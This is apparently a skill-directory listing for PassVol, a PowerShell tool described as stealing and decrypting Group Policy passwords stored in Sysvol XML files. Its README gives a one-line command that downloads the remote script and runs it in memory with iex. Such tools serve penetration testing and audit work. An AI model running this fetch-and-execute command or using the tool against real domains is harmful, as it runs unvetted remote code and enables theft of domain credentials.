SkillAgentSearch skills...

PassVol

Steal Passwords From Sysvol (Group policy)

Install / Use

/learn @securethelogs/PassVol
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

PassVol

Passvol

About

PassVoL helps identify passwords stored in GPO XML files. Once discovered it decrypts the passwords and displays.

Run

You can either download locally or run remotely:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/securethelogs/PassVol/master/PassVol.ps1')"

Credit

To be able to crack the cpasswords, I modfied the awesome script Get-DecryptedCpassword: https://github.com/obscuresec/PowerShell/blob/master/Get-DecryptedCpassword

View on GitHub
GitHub Stars11
CategoryDevelopment
Updated1y ago
Forks4

Languages

PowerShell

Security Score

60/100

Audited on Oct 12, 2024

No findings